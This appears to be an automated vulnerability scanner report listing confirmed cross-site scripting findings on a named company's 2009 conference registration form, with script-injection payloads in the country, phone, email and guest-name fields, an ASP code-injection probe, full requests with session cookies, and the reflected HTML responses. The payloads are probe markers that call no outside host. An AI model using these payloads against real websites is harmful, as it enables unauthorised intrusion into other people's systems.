Would you prefer to be contacted by e-mail or phone?


<input name="contact" type="radio" value="e-mail">
E-mail
<input name="contact" type="radio" value="phone"checked>
Phone <br><br>
</td>
</tr>


<tr align="left" valign="top" bgcolor="#eeeeee" class="mid_font">
<td colspan="3" class="mid_font"><strong>Guest Information </strong></td>
</tr>
<tr align="left" valign="top" class="mid_font">
<td class="mid_font">
Guest First name:
</td>
<td colspan="2" align="left">


<input name="gfirstname" type="text" id="gfirstname" size="35" value="Smith">
</td>
</tr>
<tr align="left" valign="top" class="mid_font">
<td class="mid_font">
- /forms/palConference.asp

/forms/palConference.asp CONFIRMED

Parameters

Parameter Type Value
error GET email
country POST '"--></style></script><script>alert(0x0056D3)</script>

Request

GET /forms/palConference.asp?error=email HTTP/1.1
Referer: http://www.stansberryresearch.com/stp_ircs/feedback/pal_registration.asp
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.stansberryresearch.com
Cookie: ASPSESSIONIDQACQTSTA=OLBOLMLBJNMPDOJIKBPKNADM; EOA+Scribble+Short+%2D+New+Style=EOA+Scribble+Short+%2D+New+Style; ASPSESSIONIDQSTBRQSC=EHHBMFABANKAIOBIIBKGHDCM; Overseas+0611=Overseas+0611; RDB=c803000000000000002d2d2d2d2d2d2d2d2d2d2d2d2d2d2d00000000000000000000000000
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Fri, 04 Nov 2011 05:55:15 GMT
Server: Microsoft-IIS/6.0
P3P: CP="UNI STA NAV COM INT DELi CUR TAI NON COR BUS DSP"
X-Powered-By: ASP.NET
Content-Length: 20132
Content-Type: text/html
Cache-control: private




<html>
<head>
<title>Stansberry & Associates</title>
<link rel="stylesheet" href="/secure/includes/css.css" type="text/css" />
<script language="JavaScript" src="/forms/includes/javascript/date_validation.js"></script>
<script language="JavaScript" src="/forms/includes/javascript/CalendarPopup.js"></script>
<script language="JavaScript">
var cal = new CalendarPopup();
</script>
<script language="javascript"
type="text/javascript">

function validateForm(pal)
{

if(""==document.forms.pal.firstname.value)
{
alert("Please enter your first name.");
return false;
}
if(""==document.forms.pal.lastname.value)
{
alert("Please enter your last name.");
return false;
}
if(""==document.forms.pal.address1.value)
{
alert("Please enter your address.");
return false;
}
if(""==document.forms.pal.city.value)
{
alert("Please enter city.");
return false;
}
if(""==document.forms.pal.zip.value)
{
alert("Please enter zip code.");
return false;
}
if(""==document.forms.pal.phone.value)
{
alert("Please enter your phone number.");
return false;
}

if(""==document.forms.pal.email.value)
{
alert("Please enter your email address.");
return false;
}
}
</script>




<script language="JavaScript">
function setVisibility(id, visibility) {
document.getElementById(id).style.display = visibility;
}
</script>


</head>
<body bgcolor="#CCCCCC">
<table width="625" border="0" align="center" cellpadding="0" cellspacing="0" bgcolor="#FFFFFF">
<tr>
<td><table width="100%" border="0" align="center" cellpadding="0" cellspacing="0">
<tr>
<td align="left" valign="top"><div align="center"><img src="/secure/images/pal_header.gif" border="0"></div></td>
</tr>
<tr>
<td><table width="600" border="0" align="center" cellpadding="3" cellspacing="0">
<tr><td bgcolor="#999999">&nbsp;
</td>
</tr>
</table>
</td>

</tr>
<tr>
<td>
<table width="600" border="0" align="center" cellpadding="10" cellspacing="0">
<tr>
<td align="center" valign="top" class="mid_font">
<b>2009 Alliance Registration Form</b><br>
<b>Monday, November 9th, 2009</b><br><br>
<b><font color="FF0000">You must register by Friday, August 28<sup>th</sup> to guarantee your spot.</font></b>

<form action="/stp_ircs/feedback/pal_registration.asp" method="post" name="pal" id="pal" onSubmit="return validateForm(pal);">
<table width="100%" border="0" cellpadding="5" cellspacing="0" class="border">
<tr align="left" valign="top" bgcolor="#eeeeee" class="mid_font">
<td colspan="2" class="mid_font"><strong><font size="2">Personal Information </strong></td>
<td width="22%" class="mid_font"><div align="right"><strong><font color="#FF0000" size="1" face="Verdana, Arial, Helvetica, sans-serif">* Required Field</strong></div></td>
</tr>
<tr align="left" valign="top" class="mid_font">
<td width="31%" class="mid_font">

Title:
</td>
<td colspan="2" align="left">

<select name="title" id="title">

<option value=""></option>

<option value="Dr.">Dr.</option>
<option value="Mr.">Mr.</option>
<option value="Mrs.">Mrs.</option>
<option value="Ms.">Ms.</option>
<option value="Miss.">Miss.</option>
<option value="Pr.">Pr.</option>
<option value="Prof.">Prof.</option>
</select>

</td>
</tr>
<tr align="left" valign="top" class="mid_font">
<td width="31%" class="mid_font">

First name:
<font color="#FF0000">*</font></td>
<td colspan="2" align="left">


<input name="firstname" type="text" id="firstname" size="35" value="Smith">
</td>
</tr>
<tr align="left" valign="top" class="mid_font">
<td class="mid_font">
Last name:
<font color="#FF0000">*</font></td>
<td colspan="2" align="left">

<input name="lastname" type="text" id="lastname" size="35" value="Smith">
</td>
</tr>

<tr align="left" valign="top" class="mid_font">
<td class="mid_font">
Address 1: <font color="#FF0000">*</font>
</td>
<td colspan="2" align="left">
<input name="address1" type="text" id="address1" size="35" value="3">
</td>
</tr>
<tr align="left" valign="top" class="mid_font">
<td class="mid_font">
Address 2:
</td>
<td colspan="2" align="left">
<input name="address2" type="text" id="address2" size="35" value="3">
</td>
</tr>
<tr align="left" valign="top" class="mid_font">
<td class="mid_font">
City:<font color="#FF0000">*</font>
</td>
<td colspan="2" align="left">
<input name="city" type="text" id="city" size="35" value="3">
</td>
</tr>
<tr align="left" valign="top" class="mid_font">
<td class="mid_font">State:
</td>
<td colspan="2" align="left">
<select name="state_" size="1" id="state_">


<option value="3">3</option>


<option value="">----------------------------------------------------</option>
<option value="AA">Armed Forces America</option>
<option value="AE">Armed Forces Europe</option>
<option value="AP">Armed Forces Pacific</option>
<option value="AL">Alabama</option>
<option value="AK">Alaska</option>
<option value="AZ">Arizona</option>
<option value="AR">Arkansas</option>
<option value="CA">California</option>
<option value="CO">Colorado</option>
<option value="CT">Connecticut</option>
<option value="DE">Delaware</option>
<option value="DC">District of Columbia</option>
<option value="FL">Florida</option>
<option value="GA">Georgia</option>
<option value="HI">Hawaii</option>
<option value="ID">Idaho</option>
<option value="IL">Illinois</option>
<option value="IN">Indiana</option>
<option value="IA">Iowa</option>
<option value="KS">Kansas</option>
<option value="KY">Kentucky</option>
<option value="LA">Louisiana</option>
<option value="ME">Maine</option>
<option value="MD">Maryland</option>
<option value="MA">Massachusetts</option>
<option value="MI">Michigan</option>
<option value="MN">Minnesota</option>
<option value="MS">Mississippi</option>
<option value="MO">Missouri</option>
<option value="MT">Montana</option>
<option value="NE">Nebraska</option>
<option value="NV">Nevada</option>
<option value="NH">New Hampshire</option>
<option value="NJ">New Jersey</option>
<option value="NM">New Mexico</option>
<option value="NY">New York</option>
<option value="NC">North Carolina</option>
<option value="ND">North Dakota</option>
<option value="OH">Ohio</option>
<option value="OK">Oklahoma</option>
<option value="OR">Oregon</option>
<option value="PA">Pennsylvania</option>
<option value="RI">Rhode Island</option>
<option value="SC">South Carolina</option>
<option value="SD">South Dakota</option>
<option value="TN">Tennessee</option>
<option value="TX">Texas</option>
<option value="UT">Utah</option>
<option value="VT">Vermont</option>
<option value="VI">Virgin Islands</option>
<option value="VA">Virginia</option>
<option value="WA">Washington</option>
<option value="WV">West Virginia</option>
<option value="WI">Wisconsin</option>
<option value="WY">Wyoming</option>
<option value="PR">Puerto Rico</option>
<option value="GU">Guam</option>
</select></td>
</tr>
<tr align="left" valign="top" class="mid_font">
<td class="mid_font">
Zip Code: <font color="#FF0000">*</font>
</td>
<td colspan="2" align="left">
<input name="zip" type="text" id="zip" size="35" value="3">
</td>
</tr>
<tr align="left" valign="top" class="mid_font">
<td class="mid_font">
Country:
</td>
<td colspan="2" align="left">
<input name="country" type="text" id="country" size="35" value="''"--></style></script><script>netsparker(0x0056D3)</script>">
</td>
</tr>

<tr align="left" valign="top" class="mid_font">
<td class="mid_font">
Phone Number: <font color="#FF0000">*</font></td>
<td colspan="2" align="left">
<input name="phone" type="text" id="phone" size="35" value="3">
</td>
</tr>
<tr align="left" valign="top" class="mid_font">
<td class="mid_font">
E-mail address: <font color="#FF0000">*</font></td>
<td colspan="2" align="left">

<input name="email" type="text" id="email" size="35" value="<% response.write(268409241-22) %>">
</td>
</tr>

<tr align="left" valign="top" class="mid_font">
<td class="mid_font"><font color="#FF0000">EMAIL DOES NOT MATCH<br>
Retype E-mail address:*</font></td>
<td colspan="2" align="left">
<font color="#FF0000">
<input name="reEmail" type="text" id="reEmail" size="35"> &nbsp;&nbsp;&nbsp;&nbsp;<b><<</b></font>
</td>
</tr>


<tr align="left" valign="top" class="mid_font">
<td colspan="3" class="mid_font">
Would you prefer to be contacted by e-mail or phone?


<input name="contact" type="radio" value="e-mail">
E-mail
<input name="contact" type="radio" value="phone"checked>
Phone <br><br>
</td>
</tr>


<tr align="left" valign="top" bgcolor="#eeeeee" class="mid_font">
<td colspan="3" class="mid_font"><strong>Guest Information </strong></td>
</tr>
<tr align="left" valign="top" class="mid_font">
<td class="mid_font">
Guest First name:
</td>
<td colspan="2" align="left">


<input name="gfirstname" type="text" id="gfirstname" size="35" value="Smith">
</td>
</tr>
<tr align="left" valign="top" class="mid_font">
<td class="mid_font">
- /forms/palConference.asp

/forms/palConference.asp CONFIRMED

Parameters

Parameter Type Value
error GET email
phone POST '"--></style></script><script>alert(0x0056D5)</script>

Request

GET /forms/palConference.asp?error=email HTTP/1.1
Referer: http://www.stansberryresearch.com/stp_ircs/feedback/pal_registration.asp
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.stansberryresearch.com
Cookie: ASPSESSIONIDQACQTSTA=OLBOLMLBJNMPDOJIKBPKNADM; EOA+Scribble+Short+%2D+New+Style=EOA+Scribble+Short+%2D+New+Style; ASPSESSIONIDQSTBRQSC=EHHBMFABANKAIOBIIBKGHDCM; Overseas+0611=Overseas+0611; RDB=c803000000000000002d2d2d2d2d2d2d2d2d2d2d2d2d2d2d00000000000000000000000000
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Fri, 04 Nov 2011 05:55:16 GMT
Server: Microsoft-IIS/6.0
P3P: CP="UNI STA NAV COM INT DELi CUR TAI NON COR BUS DSP"
X-Powered-By: ASP.NET
Content-Length: 20132
Content-Type: text/html
Cache-control: private




<html>
<head>
<title>Stansberry & Associates</title>
<link rel="stylesheet" href="/secure/includes/css.css" type="text/css" />
<script language="JavaScript" src="/forms/includes/javascript/date_validation.js"></script>
<script language="JavaScript" src="/forms/includes/javascript/CalendarPopup.js"></script>
<script language="JavaScript">
var cal = new CalendarPopup();
</script>
<script language="javascript"
type="text/javascript">

function validateForm(pal)
{

if(""==document.forms.pal.firstname.value)
{
alert("Please enter your first name.");
return false;
}
if(""==document.forms.pal.lastname.value)
{
alert("Please enter your last name.");
return false;
}
if(""==document.forms.pal.address1.value)
{
alert("Please enter your address.");
return false;
}
if(""==document.forms.pal.city.value)
{
alert("Please enter city.");
return false;
}
if(""==document.forms.pal.zip.value)
{
alert("Please enter zip code.");
return false;
}
if(""==document.forms.pal.phone.value)
{
alert("Please enter your phone number.");
return false;
}

if(""==document.forms.pal.email.value)
{
alert("Please enter your email address.");
return false;
}
}
</script>




<script language="JavaScript">
function setVisibility(id, visibility) {
document.getElementById(id).style.display = visibility;
}
</script>


</head>
<body bgcolor="#CCCCCC">
<table width="625" border="0" align="center" cellpadding="0" cellspacing="0" bgcolor="#FFFFFF">
<tr>
<td><table width="100%" border="0" align="center" cellpadding="0" cellspacing="0">
<tr>
<td align="left" valign="top"><div align="center"><img src="/secure/images/pal_header.gif" border="0"></div></td>
</tr>
<tr>
<td><table width="600" border="0" align="center" cellpadding="3" cellspacing="0">
<tr><td bgcolor="#999999">&nbsp;
</td>
</tr>
</table>
</td>

</tr>
<tr>
<td>
<table width="600" border="0" align="center" cellpadding="10" cellspacing="0">
<tr>
<td align="center" valign="top" class="mid_font">
<b>2009 Alliance Registration Form</b><br>
<b>Monday, November 9th, 2009</b><br><br>
<b><font color="FF0000">You must register by Friday, August 28<sup>th</sup> to guarantee your spot.</font></b>

<form action="/stp_ircs/feedback/pal_registration.asp" method="post" name="pal" id="pal" onSubmit="return validateForm(pal);">
<table width="100%" border="0" cellpadding="5" cellspacing="0" class="border">
<tr align="left" valign="top" bgcolor="#eeeeee" class="mid_font">
<td colspan="2" class="mid_font"><strong><font size="2">Personal Information </strong></td>
<td width="22%" class="mid_font"><div align="right"><strong><font color="#FF0000" size="1" face="Verdana, Arial, Helvetica, sans-serif">* Required Field</strong></div></td>
</tr>
<tr align="left" valign="top" class="mid_font">
<td width="31%" class="mid_font">

Title:
</td>
<td colspan="2" align="left">

<select name="title" id="title">

<option value=""></option>

<option value="Dr.">Dr.</option>
<option value="Mr.">Mr.</option>
<option value="Mrs.">Mrs.</option>
<option value="Ms.">Ms.</option>
<option value="Miss.">Miss.</option>
<option value="Pr.">Pr.</option>
<option value="Prof.">Prof.</option>
</select>

</td>
</tr>
<tr align="left" valign="top" class="mid_font">
<td width="31%" class="mid_font">

First name:
<font color="#FF0000">*</font></td>
<td colspan="2" align="left">


<input name="firstname" type="text" id="firstname" size="35" value="Smith">
</td>
</tr>
<tr align="left" valign="top" class="mid_font">
<td class="mid_font">
Last name:
<font color="#FF0000">*</font></td>
<td colspan="2" align="left">

<input name="lastname" type="text" id="lastname" size="35" value="Smith">
</td>
</tr>

<tr align="left" valign="top" class="mid_font">
<td class="mid_font">
Address 1: <font color="#FF0000">*</font>
</td>
<td colspan="2" align="left">
<input name="address1" type="text" id="address1" size="35" value="3">
</td>
</tr>
<tr align="left" valign="top" class="mid_font">
<td class="mid_font">
Address 2:
</td>
<td colspan="2" align="left">
<input name="address2" type="text" id="address2" size="35" value="3">
</td>
</tr>
<tr align="left" valign="top" class="mid_font">
<td class="mid_font">
City:<font color="#FF0000">*</font>
</td>
<td colspan="2" align="left">
<input name="city" type="text" id="city" size="35" value="3">
</td>
</tr>
<tr align="left" valign="top" class="mid_font">
<td class="mid_font">State:
</td>
<td colspan="2" align="left">
<select name="state_" size="1" id="state_">


<option value="3">3</option>


<option value="">----------------------------------------------------</option>
<option value="AA">Armed Forces America</option>
<option value="AE">Armed Forces Europe</option>
<option value="AP">Armed Forces Pacific</option>
<option value="AL">Alabama</option>
<option value="AK">Alaska</option>
<option value="AZ">Arizona</option>
<option value="AR">Arkansas</option>
<option value="CA">California</option>
<option value="CO">Colorado</option>
<option value="CT">Connecticut</option>
<option value="DE">Delaware</option>
<option value="DC">District of Columbia</option>
<option value="FL">Florida</option>
<option value="GA">Georgia</option>
<option value="HI">Hawaii</option>
<option value="ID">Idaho</option>
<option value="IL">Illinois</option>
<option value="IN">Indiana</option>
<option value="IA">Iowa</option>
<option value="KS">Kansas</option>
<option value="KY">Kentucky</option>
<option value="LA">Louisiana</option>
<option value="ME">Maine</option>
<option value="MD">Maryland</option>
<option value="MA">Massachusetts</option>
<option value="MI">Michigan</option>
<option value="MN">Minnesota</option>
<option value="MS">Mississippi</option>
<option value="MO">Missouri</option>
<option value="MT">Montana</option>
<option value="NE">Nebraska</option>
<option value="NV">Nevada</option>
<option value="NH">New Hampshire</option>
<option value="NJ">New Jersey</option>
<option value="NM">New Mexico</option>
<option value="NY">New York</option>
<option value="NC">North Carolina</option>
<option value="ND">North Dakota</option>
<option value="OH">Ohio</option>
<option value="OK">Oklahoma</option>
<option value="OR">Oregon</option>
<option value="PA">Pennsylvania</option>
<option value="RI">Rhode Island</option>
<option value="SC">South Carolina</option>
<option value="SD">South Dakota</option>
<option value="TN">Tennessee</option>
<option value="TX">Texas</option>
<option value="UT">Utah</option>
<option value="VT">Vermont</option>
<option value="VI">Virgin Islands</option>
<option value="VA">Virginia</option>
<option value="WA">Washington</option>
<option value="WV">West Virginia</option>
<option value="WI">Wisconsin</option>
<option value="WY">Wyoming</option>
<option value="PR">Puerto Rico</option>
<option value="GU">Guam</option>
</select></td>
</tr>
<tr align="left" valign="top" class="mid_font">
<td class="mid_font">
Zip Code: <font color="#FF0000">*</font>
</td>
<td colspan="2" align="left">
<input name="zip" type="text" id="zip" size="35" value="3">
</td>
</tr>
<tr align="left" valign="top" class="mid_font">
<td class="mid_font">
Country:
</td>
<td colspan="2" align="left">
<input name="country" type="text" id="country" size="35" value="3">
</td>
</tr>

<tr align="left" valign="top" class="mid_font">
<td class="mid_font">
Phone Number: <font color="#FF0000">*</font></td>
<td colspan="2" align="left">
<input name="phone" type="text" id="phone" size="35" value="''"--></style></script><script>netsparker(0x0056D5)</script>">
</td>
</tr>
<tr align="left" valign="top" class="mid_font">
<td class="mid_font">
E-mail address: <font color="#FF0000">*</font></td>
<td colspan="2" align="left">

<input name="email" type="text" id="email" size="35" value="<% response.write(268409241-22) %>">
</td>
</tr>

<tr align="left" valign="top" class="mid_font">
<td class="mid_font"><font color="#FF0000">EMAIL DOES NOT MATCH<br>
Retype E-mail address:*</font></td>
<td colspan="2" align="left">
<font color="#FF0000">
<input name="reEmail" type="text" id="reEmail" size="35"> &nbsp;&nbsp;&nbsp;&nbsp;<b><<</b></font>
</td>
</tr>


<tr align="left" valign="top" class="mid_font">
<td colspan="3" class="mid_font">
Would you prefer to be contacted by e-mail or phone?


<input name="contact" type="radio" value="e-mail">
E-mail
<input name="contact" type="radio" value="phone"checked>
Phone <br><br>
</td>
</tr>


<tr align="left" valign="top" bgcolor="#eeeeee" class="mid_font">
<td colspan="3" class="mid_font"><strong>Guest Information </strong></td>
</tr>
<tr align="left" valign="top" class="mid_font">
<td class="mid_font">
Guest First name:
</td>
<td colspan="2" align="left">


<input name="gfirstname" type="text" id="gfirstname" size="35" value="Smith">
</td>
</tr>
<tr align="left" valign="top" class="mid_font">
<td class="mid_font">
- /forms/palConference.asp

/forms/palConference.asp CONFIRMED

Parameters

Parameter Type Value
error GET email
email POST '"--></style></script><script>alert(0x0056D9)</script>

Request

GET /forms/palConference.asp?error=email HTTP/1.1
Referer: http://www.stansberryresearch.com/stp_ircs/feedback/pal_registration.asp
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.stansberryresearch.com
Cookie: ASPSESSIONIDQACQTSTA=OLBOLMLBJNMPDOJIKBPKNADM; EOA+Scribble+Short+%2D+New+Style=EOA+Scribble+Short+%2D+New+Style; ASPSESSIONIDQSTBRQSC=EHHBMFABANKAIOBIIBKGHDCM; Overseas+0611=Overseas+0611; RDB=c803000000000000002d2d2d2d2d2d2d2d2d2d2d2d2d2d2d00000000000000000000000000
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Fri, 04 Nov 2011 05:55:18 GMT
Server: Microsoft-IIS/6.0
P3P: CP="UNI STA NAV COM INT DELi CUR TAI NON COR BUS DSP"
X-Powered-By: ASP.NET
Content-Length: 20099
Content-Type: text/html
Cache-control: private




<html>
<head>
<title>Stansberry & Associates</title>
<link rel="stylesheet" href="/secure/includes/css.css" type="text/css" />
<script language="JavaScript" src="/forms/includes/javascript/date_validation.js"></script>
<script language="JavaScript" src="/forms/includes/javascript/CalendarPopup.js"></script>
<script language="JavaScript">
var cal = new CalendarPopup();
</script>
<script language="javascript"
type="text/javascript">

function validateForm(pal)
{

if(""==document.forms.pal.firstname.value)
{
alert("Please enter your first name.");
return false;
}
if(""==document.forms.pal.lastname.value)
{
alert("Please enter your last name.");
return false;
}
if(""==document.forms.pal.address1.value)
{
alert("Please enter your address.");
return false;
}
if(""==document.forms.pal.city.value)
{
alert("Please enter city.");
return false;
}
if(""==document.forms.pal.zip.value)
{
alert("Please enter zip code.");
return false;
}
if(""==document.forms.pal.phone.value)
{
alert("Please enter your phone number.");
return false;
}

if(""==document.forms.pal.email.value)
{
alert("Please enter your email address.");
return false;
}
}
</script>




<script language="JavaScript">
function setVisibility(id, visibility) {
document.getElementById(id).style.display = visibility;
}
</script>


</head>
<body bgcolor="#CCCCCC">
<table width="625" border="0" align="center" cellpadding="0" cellspacing="0" bgcolor="#FFFFFF">
<tr>
<td><table width="100%" border="0" align="center" cellpadding="0" cellspacing="0">
<tr>
<td align="left" valign="top"><div align="center"><img src="/secure/images/pal_header.gif" border="0"></div></td>
</tr>
<tr>
<td><table width="600" border="0" align="center" cellpadding="3" cellspacing="0">
<tr><td bgcolor="#999999">&nbsp;
</td>
</tr>
</table>
</td>

</tr>
<tr>
<td>
<table width="600" border="0" align="center" cellpadding="10" cellspacing="0">
<tr>
<td align="center" valign="top" class="mid_font">
<b>2009 Alliance Registration Form</b><br>
<b>Monday, November 9th, 2009</b><br><br>
<b><font color="FF0000">You must register by Friday, August 28<sup>th</sup> to guarantee your spot.</font></b>

<form action="/stp_ircs/feedback/pal_registration.asp" method="post" name="pal" id="pal" onSubmit="return validateForm(pal);">
<table width="100%" border="0" cellpadding="5" cellspacing="0" class="border">
<tr align="left" valign="top" bgcolor="#eeeeee" class="mid_font">
<td colspan="2" class="mid_font"><strong><font size="2">Personal Information </strong></td>
<td width="22%" class="mid_font"><div align="right"><strong><font color="#FF0000" size="1" face="Verdana, Arial, Helvetica, sans-serif">* Required Field</strong></div></td>
</tr>
<tr align="left" valign="top" class="mid_font">
<td width="31%" class="mid_font">

Title:
</td>
<td colspan="2" align="left">

<select name="title" id="title">

<option value=""></option>

<option value="Dr.">Dr.</option>
<option value="Mr.">Mr.</option>
<option value="Mrs.">Mrs.</option>
<option value="Ms.">Ms.</option>
<option value="Miss.">Miss.</option>
<option value="Pr.">Pr.</option>
<option value="Prof.">Prof.</option>
</select>

</td>
</tr>
<tr align="left" valign="top" class="mid_font">
<td width="31%" class="mid_font">

First name:
<font color="#FF0000">*</font></td>
<td colspan="2" align="left">


<input name="firstname" type="text" id="firstname" size="35" value="Smith">
</td>
</tr>
<tr align="left" valign="top" class="mid_font">
<td class="mid_font">
Last name:
<font color="#FF0000">*</font></td>
<td colspan="2" align="left">

<input name="lastname" type="text" id="lastname" size="35" value="Smith">
</td>
</tr>

<tr align="left" valign="top" class="mid_font">
<td class="mid_font">
Address 1: <font color="#FF0000">*</font>
</td>
<td colspan="2" align="left">
<input name="address1" type="text" id="address1" size="35" value="3">
</td>
</tr>
<tr align="left" valign="top" class="mid_font">
<td class="mid_font">
Address 2:
</td>
<td colspan="2" align="left">
<input name="address2" type="text" id="address2" size="35" value="3">
</td>
</tr>
<tr align="left" valign="top" class="mid_font">
<td class="mid_font">
City:<font color="#FF0000">*</font>
</td>
<td colspan="2" align="left">
<input name="city" type="text" id="city" size="35" value="3">
</td>
</tr>
<tr align="left" valign="top" class="mid_font">
<td class="mid_font">State:
</td>
<td colspan="2" align="left">
<select name="state_" size="1" id="state_">


<option value="3">3</option>


<option value="">----------------------------------------------------</option>
<option value="AA">Armed Forces America</option>
<option value="AE">Armed Forces Europe</option>
<option value="AP">Armed Forces Pacific</option>
<option value="AL">Alabama</option>
<option value="AK">Alaska</option>
<option value="AZ">Arizona</option>
<option value="AR">Arkansas</option>
<option value="CA">California</option>
<option value="CO">Colorado</option>
<option value="CT">Connecticut</option>
<option value="DE">Delaware</option>
<option value="DC">District of Columbia</option>
<option value="FL">Florida</option>
<option value="GA">Georgia</option>
<option value="HI">Hawaii</option>
<option value="ID">Idaho</option>
<option value="IL">Illinois</option>
<option value="IN">Indiana</option>
<option value="IA">Iowa</option>
<option value="KS">Kansas</option>
<option value="KY">Kentucky</option>
<option value="LA">Louisiana</option>
<option value="ME">Maine</option>
<option value="MD">Maryland</option>
<option value="MA">Massachusetts</option>
<option value="MI">Michigan</option>
<option value="MN">Minnesota</option>
<option value="MS">Mississippi</option>
<option value="MO">Missouri</option>
<option value="MT">Montana</option>
<option value="NE">Nebraska</option>
<option value="NV">Nevada</option>
<option value="NH">New Hampshire</option>
<option value="NJ">New Jersey</option>
<option value="NM">New Mexico</option>
<option value="NY">New York</option>
<option value="NC">North Carolina</option>
<option value="ND">North Dakota</option>
<option value="OH">Ohio</option>
<option value="OK">Oklahoma</option>
<option value="OR">Oregon</option>
<option value="PA">Pennsylvania</option>
<option value="RI">Rhode Island</option>
<option value="SC">South Carolina</option>
<option value="SD">South Dakota</option>
<option value="TN">Tennessee</option>
<option value="TX">Texas</option>
<option value="UT">Utah</option>
<option value="VT">Vermont</option>
<option value="VI">Virgin Islands</option>
<option value="VA">Virginia</option>
<option value="WA">Washington</option>
<option value="WV">West Virginia</option>
<option value="WI">Wisconsin</option>
<option value="WY">Wyoming</option>
<option value="PR">Puerto Rico</option>
<option value="GU">Guam</option>
</select></td>
</tr>
<tr align="left" valign="top" class="mid_font">
<td class="mid_font">
Zip Code: <font color="#FF0000">*</font>
</td>
<td colspan="2" align="left">
<input name="zip" type="text" id="zip" size="35" value="3">
</td>
</tr>
<tr align="left" valign="top" class="mid_font">
<td class="mid_font">
Country:
</td>
<td colspan="2" align="left">
<input name="country" type="text" id="country" size="35" value="3">
</td>
</tr>

<tr align="left" valign="top" class="mid_font">
<td class="mid_font">
Phone Number: <font color="#FF0000">*</font></td>
<td colspan="2" align="left">
<input name="phone" type="text" id="phone" size="35" value="3">
</td>
</tr>
<tr align="left" valign="top" class="mid_font">
<td class="mid_font">
E-mail address: <font color="#FF0000">*</font></td>
<td colspan="2" align="left">

<input name="email" type="text" id="email" size="35" value="''"--></style></script><script>netsparker(0x0056D9)</script>">
</td>
</tr>

<tr align="left" valign="top" class="mid_font">
<td class="mid_font"><font color="#FF0000">EMAIL DOES NOT MATCH<br>
Retype E-mail address:*</font></td>
<td colspan="2" align="left">
<font color="#FF0000">
<input name="reEmail" type="text" id="reEmail" size="35"> &nbsp;&nbsp;&nbsp;&nbsp;<b><<</b></font>
</td>
</tr>


<tr align="left" valign="top" class="mid_font">
<td colspan="3" class="mid_font">
Would you prefer to be contacted by e-mail or phone?


<input name="contact" type="radio" value="e-mail">
E-mail
<input name="contact" type="radio" value="phone"checked>
Phone <br><br>
</td>
</tr>


<tr align="left" valign="top" bgcolor="#eeeeee" class="mid_font">
<td colspan="3" class="mid_font"><strong>Guest Information </strong></td>
</tr>
<tr align="left" valign="top" class="mid_font">
<td class="mid_font">
Guest First name:
</td>
<td colspan="2" align="left">


<input name="gfirstname" type="text" id="gfirstname" size="35" value="Smith">
</td>
</tr>
<tr align="left" valign="top" class="mid_font">
<td class="mid_font">
Guest Last na..
- /forms/palConference.asp

/forms/palConference.asp CONFIRMED

Parameters

Parameter Type Value
error GET email
gfirstname POST '"--></style></script><script>alert(0x005705)</script>

Request

GET /forms/palConference.asp?error=email HTTP/1.1
Referer: http://www.stansberryresearch.com/stp_ircs/feedback/pal_registration.asp
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.stansberryresearch.com
Cookie: ASPSESSIONIDQACQTSTA=OLBOLMLBJNMPDOJIKBPKNADM; EOA+Scribble+Short+%2D+New+Style=EOA+Scribble+Short+%2D+New+Style; ASPSESSIONIDQSTBRQSC=EHHBMFABANKAIOBIIBKGHDCM; Overseas+0611=Overseas+0611; RDB=c803000000000000002d2d2d2d2d2d2d2d2d2d2d2d2d2d2d00000000000000000000000000
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Fri, 04 Nov 2011 05:55:27 GMT
Server: Microsoft-IIS/6.0
P3P: CP="UNI STA NAV COM INT DELi CUR TAI NON COR BUS DSP"
X-Powered-By: ASP.NET
Content-Length: 20128
Content-Type: text/html
Cache-control: private




<html>
<head>
<title>Stansberry & Associates</title>
<link rel="stylesheet" href="/secure/includes/css.css" type="text/css" />
<script language="JavaScript" src="/forms/includes/javascript/date_validation.js"></script>
<script language="JavaScript" src="/forms/includes/javascript/CalendarPopup.js"></script>
<script language="JavaScript">
var cal = new CalendarPopup();
</script>
<script language="javascript"
type="text/javascript">

function validateForm(pal)
{

if(""==document.forms.pal.firstname.value)
{
alert("Please enter your first name.");
return false;
}
if(""==document.forms.pal.lastname.value)
{
alert("Please enter your last name.");
return false;
}
if(""==document.forms.pal.address1.value)
{
alert("Please enter your address.");
return false;
}
if(""==document.forms.pal.city.value)
{
alert("Please enter city.");
return false;
}
if(""==document.forms.pal.zip.value)
{
alert("Please enter zip code.");
return false;
}
if(""==document.forms.pal.phone.value)
{
alert("Please enter your phone number.");
return false;
}

if(""==document.forms.pal.email.value)
{
alert("Please enter your email address.");
return false;
}
}
</script>




<script language="JavaScript">
function setVisibility(id, visibility) {
document.getElementById(id).style.display = visibility;
}
</script>


</head>
<body bgcolor="#CCCCCC">
<table width="625" border="0" align="center" cellpadding="0" cellspacing="0" bgcolor="#FFFFFF">
<tr>
<td><table width="100%" border="0" align="center" cellpadding="0" cellspacing="0">
<tr>
<td align="left" valign="top"><div align="center"><img src="/secure/images/pal_header.gif" border="0"></div></td>
</tr>
<tr>
<td><table width="600" border="0" align="center" cellpadding="3" cellspacing="0">
<tr><td bgcolor="#999999">&nbsp;
</td>
</tr>
</table>
</td>

</tr>
